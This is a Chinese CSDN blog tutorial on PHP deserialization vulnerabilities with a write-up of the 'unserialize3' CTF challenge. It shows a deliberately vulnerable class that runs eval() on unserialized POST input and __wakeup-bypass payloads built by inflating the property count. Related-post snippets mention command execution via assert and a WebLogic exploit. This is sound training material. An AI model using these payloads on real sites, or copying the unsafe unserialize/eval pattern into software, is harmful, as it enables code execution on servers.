unserialize3与反序列化漏洞零基础详解

最新推荐文章于 2025-03-25 11:33:34 发布
最新推荐文章于 2025-03-25 11:33:34 发布
阅读量4.5k 收藏 29
点赞数 8
分类专栏: 攻防世界 渗透测试 文章标签: php 反序列化漏洞 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_58784379/article/details/120169420
版权
本文讲解了PHP中的序列化与反序列化概念,通过实例演示了如何理解漏洞原理,并结合CTF题目展示了如何利用__wakeup魔术方法绕过安全措施。重点讨论了unserialize3解题策略,包括payload构造和优先级的理解。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在解这道题之前,首先非常感谢https://www.ajsafe.com/news/315.html这篇文章,给反序列化不太了解的我带来了启发,与借鉴,比如反序列化是什么,怎么形成反序列化漏洞等等

目录

反序列化漏洞(序列化←→反序列化)

什么是序列化(serialize)

什么是反序列化(unserialize)

通过demo理解反序列化漏洞

下面这段代码为序列化,可以理解为编码

下面这段代码为反序列化,可以理解为解码

通过某道CTF实际题目理解反序列化漏洞,与解题过程

优先级演示证明:

unserialize3解题

反序列化漏洞(序列化←→反序列化)

什么是序列化(serialize)

将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将状态信息保存为字符串

什么是反序列化(unserialize)

将字符串转换为状态信息

PHP内的几个特殊魔术方法

  1. __construct():当对象创建(new)时会自动调用,但在unserialize()时是不会自动调用的(构造函数)

  2. __destruct():当对象操作执行完毕后自动执行destruct()函数的代码

  3. __wakeup():unserialize()时自动调用

  4. __call()方法当调用类实例中不存在的函数时自动执行

通过demo理解反序列化漏洞

如果将序列化理解为编码时,那么反序列化即为解码

举例解释:

下面这段代码为序列化,可以理解为编码

<?php
class test{
 public $name = "f1r3K0";
 public $age = "18";
}
$class = new test();
$class_ser = serialize($class);
print_r($class_ser);
?>

O代表object(为A时代表Array),4代表"test"占4个字符长度,2代表着对象具有两个变量:name和age,s代表string,字符型(如果为i,代表int型)

下面这段代码为反序列化,可以理解为解码

<?php
class test{
 public $name = "f1r3K0";
 public $age = "18";
}
$class = new test();
$class_ser = serialize($class);
print_r($class_ser);
$class_unser = unserialize($class_ser);
print_r($class_unser);
?>

当使用unserialize()恢复对象时,将调用__weakup(),serialize()函数将表单内容序列化成一个字符串

通过某道CTF实际题目理解反序列化漏洞,与解题过程

<?php
highlight_file(_FILE_);
error_reporting(0);
class convent{
	var $warn="No hacker.";
	function __destruct(){
	eval($this->warn);
	}
	function __wakeup(){
		foreach(get_object_vars($this) as $k => $v){
			$this->$k=null;
		}
	}
}
$cmd=$_POST[cmd];
unserialize($cmd);

__destruct:对象操作执行完毕之后自动执行该函数内的代码

__wakeup:遇到unserialize()时自动触发

__wakeup是优先执行的,

优先级高于__destruct。

优先级演示证明:

<?php
header("Content-type:text/html;charset=utf-8");
class people{
	public $namee='ganyu';
	public $age='20';
         function __destruct(){
            echo"_destruct()";
            echo"<br>";
	}
        function __wakeup(){
                echo"_wakeup()";
                echo"<br>";
		}
	}
$class=new people();
$class_ser=serialize($class);
$class_unser=unserialize($class_ser);

再回到之前的CTF题目就明白了,优先执行wakeup的内容,才执行destruct,由于wakeup时会将warn值进行过滤,变为null值,所以不能使wakeup执行

wakeup是当反序列化成功时,才会调用,那我们让它失败呢?其实只要让它失败,是不是就不会调用这个魔术方法了?

<?php
highlight_file(_FILE_);
error_reporting(0);
class convent{
	var $warn="No hacker.";
	function __destruct(){
	eval($this->warn);
	}
	function __wakeup(){
		foreach(get_object_vars($this) as $k => $v){
			$this->$k=null;
		}
	}
}
$b=new convent();
$c=serialize($b);
echo $c;
?>

O:7:"convent":1:{s:4:"warn";s:10:"No hacker.";}  

里面的值是不可修改的,但是可以修改的属性(变量)数大于实际的个数时,就可以绕过 wakeup

构造payload:O:7:"convent":2:{s:4:"warn";s:10:"No hacker.";}【其实就是将1改为2,目的达到随便改都行】

最后将构造的payload传入即可,当看到这里的时候,再回去看我们这道题就非常非常简单了

unserialize3解题

当看到这里的时候,那么恭喜你,这题对你来说只是单纯的__wakeup(),将构造的payload输入至?code后即可

首先将代码补全

<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
	}		
}
$b=new xctf();
$c=serialize($b);
echo $c;
?>

输出

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

O代表object(为A时代表Array),4代表"test"占4个字符长度,2代表着对象具有两个变量:name和age,s代表string,字符型(如果为i,代表int型)

修改下,绕过即可

payload:O:4:"xctf":2:{s:4:"flag";s:3:"111";}

回车拿flag

UNSERIALIZE——反序列化漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-19 5751
Unserialize反序列化 什么是序列化? 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 【将状态信息保存为字符串】 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中 什么是反序列化? 序列化就是将对象的状态信息转为字符串储存起来,那么反序列化就是再将这个状态信息拿出来使用。(重新再转化为对象
unserialize反序列化漏洞
weixin_45634365的博客
03-27 780
一、序列化 序列化(serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区,之后可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 简单地说,就是将状态信息保存为字符串。例如,将PHP中的对象、类、数组、变量、匿名函数等转化为字符串,方便保存到数据库或者文件中。 反序列化: 序列化是将对象的状态信息转为字符串储存起来,反序列化就是将字符串转化为状态信息,即从新将状态信息拿出来使用。 ...
还在啃“反序列化”这块硬骨头?从零基础到精通,收藏这篇就够了!
最新发布
bdfcfff77fa的博客
03-25 1174
简单来说,序列化就是把咱们的对象,“biu”的一下变成字符串,方便存储和传输。就是把这个“biu”过的字符串,再“biu”回去,变回原来的对象,让程序接着用。掌握它们,你就能轻松玩转PHP的重载(Overloading,就是动态创建类属性和方法)。当程序“biu”回去的时候(也就是反序列化时),会偷偷摸摸地调用一些“神秘函数”,比如。把它变成一个字符串,就像给它穿上了一层“盔甲”,方便保存和传递。就像一个“时光机”,能把序列化后的字符串,还原成原来的对象。在PHP里,咱们new 了一个对象之后,可以用。
网络安全从入门到精通(第十章-4)unserialize反序列化漏洞
划水的小白白
02-25 623
本文内容: ~什么是序列化 ~魔术方法和反序列化利用 ~实战注意 每日一句: 希望大家学习了相关技术 多为我国的网络安全做贡献 不要做违法乱纪的事请!!!
渗透测试基础 -unserialize反序列化漏洞
weixin_45488495的博客
05-04 1069
渗透测试基础-unserialize反序列化漏洞什么是序列化什么是反序列化类 | 对象魔术方法反序列化靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 什么是序列化 serialize 为 序列化的意思 unserialize 为 取消 序列化,在这理解为反序列化 那先来说一下,什么是序列化?: 序列化(serialize)是将对象的状态信息转换为可以储存或传输的形式的过程。在序列化期间对象将其当前状态写入到临时
CTF做题笔记--unserialize3
Hasur的博客
03-03 482
如果我们按照上图的方式,直接将获取的字符串输入进去,发现wakeup()函数成功的调用了,为了让他不被使用,我们可以将里面的属性值1改成其他任意大于他的数字就可以获得flag。序列化指的是:是将变量转换为可保存或传输的字符串的过程,反序列化就是一个相反的过程。通过观察,在这里有一个wakeup()函数,我们就可以得知这是一个反序列化漏洞。所以在这道题目中,我们需要去确认一下该序列化字符串的属性值。这道题主要是考察大家反序列化的知识,我们先来进入一下题目。在这里我们先介绍一下什么叫序列化,
反序列化漏洞验证:unserialize反序列化
zh的博客
10-16 555
靶场地址:http://www.whalwl.site:8026/ 解题准备:了解unserialize函数 解题思路: 1、将靶场提示代码搭建成网页,手动添加 $obj=new site(); echo serialize($obj); 2、访问网页获取反序列化后的字符串 使用dage参数传递反序列化字符串,尝试各种危险函数,最后assert成功了 3、 POST方式提交dage,执行ls命令,得到flag文件名 dage=O:4:"site":3:{s:3:"url";s:
PHP多种序列化/反序列化的方法详解
10-19
- `serialize` 和 `unserialize` 是PHP中基础且常用的序列化和反序列化工具,适用于大部分情况。 - `json_encode` 和 `json_decode` 提供了更紧凑、更易读的序列化格式,且跨语言兼容性好。 - `var_export` 和 `eval...
详解PHP序列化和反序列化原理
10-18
PHP通过serialize()和unserialize()两个函数来实现序列化和反序列化操作,其中,序列化后得到的字符串格式是PHP特有的,它JSON的字符串格式类似,但并非通用的格式。 接下来,序列化过程中的自描述问题要解决的是...
反序列化漏洞-01】序列化反序列化简介
m0_64378913的博客
07-22 469
序列化反序列化过程在php、python等多种语言中普遍存在。序列化程序将对象状态转换为可存储或传输的字节序列的过程(即将对象状态转换为可存储或可传输的过程)反序列化程序把存储或传输的字节序列恢复为对象的过程。核心思想对象状态的保存和重建。PHP中的序列化反序列化,基本都是围绕和两个函数展开的。(1)了解序列化反序列化的作用;(1)掌握PHP中序列化反序列化的使用方法。...
详解PHP序列化反序列化的方法
12-19
同时,需要注意的是,不安全的反序列化可能导致安全问题,比如session反序列化漏洞,因此在处理反序列化数据时应格外谨慎,确保数据来源的安全性。 总的来说,理解PHP的序列化和反序列化是提升PHP编程技能的关键,...
weblogic_unserialize_exploit:Java反序列化vul以进行weblogic利用
04-30
weblogic unserialize exploit java反序列化漏洞(CVE-2015-4852)的weblogic exploit命令回显exp 1.依赖组件 python 2.7 java 2. 程序说明 exploit方法来源于Freebuf的”Java反序列化漏洞之weblogic本地利用实现篇”,基于rebeyond大牛的研究和反编译WebLogic_EXP.jar实现的。 rebeyond的方法相比,只提取了WebLogic_EXP.jar中用到的少数几个java class,使用python脚本来实现exploit。 根据网上和自己测试的weblogic反序列化漏洞,完善了CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2018-2628和CVE-2018-2893的批量检测脚本(weblogic_check_vuls.
反序列化漏洞-02】PHP反序列化漏洞实验详解
cc
03-02 3065
序列化:程序将对象状态转换为可存储或传输的字节序列的过程(即对象状态转换为可存储或者可传输的过程){序列化是对象转换为字符串的过程}反序列化:程序把存储或传输的字节序列恢复为对象的过程。{反序列化则是字符串转化为对象的过程}如果字符串客户端可控,就会造成web应用反序列化任意对象,严重的是在反序列化的过程中会触发一些可以执行的php代码,例如phpinfoPHP中的序列化反序列化,基本都是围绕和两个函数展开的。在介绍这两个函数之前,我们可以先看一个简单的例子。
反序列化漏洞(例题 web unserialize3)(保姆级新手教程)(有些地方讲的不好不对,请批评指正)
qq_74035288的博客
04-25 180
我们不能直接反改序列化字符得到flag,因为看网站源码有--wakeup(),我们搜索,知道了,**__wakeup()**是PHP的一个魔法函数(一般魔法函数都以两条下划线开头),在进行unserialize。根据本题我们得到的序列化字符串,看到标准的格式:O:<类名的长度>:“<类名>”:<成员属性的个数>:{S:…类成员属性的个数的判断:class里定义了几个变量,就有几个类成员属性,所以我们由①式看到本题属性个数为1,我们改成2,或3或以上,就可以执行漏洞了。s:3:"111";
反序列化(Unserialize)漏洞详解
热门推荐
qq_49422880的博客
09-28 1万+
序列化和反序列化漏洞分析   序列化(serialize) 就将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将当前的状态写入到临时或持久性的存储区 【将状态信息保存为字符串】。   反序列化(unserialize) 就是把序列化之后的字符串在转化为对象。 其实在序列化的过程中是没有任何的漏洞的,产生漏洞的主要的原因就是在反序列化的过程中,通过我们的恶意篡改会产生魔法函数绕过,字符逃逸,远程命令执行等漏洞,最早发现这些漏洞的大佬是真的牛。 一、简单的魔法函数 魔法函数 调用
unserialize3
sinat_31884905的博客
02-19 382
CTF竞赛 | PHP反序列化基础 原创 betaseclabs 贝塔安全实验室 1周前 通过序列化反序列化我们可以很方便的在PHP中传递对象,下面小编给大家介绍反序列化的原理和一些常见的利用方式。 01 序列化和反序列化概述 (1)序列化和反序列化: 序列化:将对象的状态信息转换成可存储或者传输的形式过程; 反序列化:将可存储或者传输的形式过程恢复为对象的过程; 存储形式:二进制、XML、JSON (2)常见反序列化漏洞: Weblogic: CVE-2018-2893、CVE-2018-2628、
反序列化漏洞详解
qq_48904485的博客
03-21 4247
一、基础知识 1、序列化 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s
PHP反序列化漏洞
qq_49714982的博客
03-08 1162
序列化通过serialize(),反序列化unserialze()只有属性会被序列化,而方法不会被反序列化
攻防世界序列化漏洞详解利用
"攻防世界序列化问题详解" 在网络安全领域,尤其是CTF(Capture The Flag)挑战中,序列化和反序列化是常见的漏洞利用点。本篇内容主要聚焦于攻防世界平台中涉及的序列化问题,通过一道具体的题目来深入解析这一...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值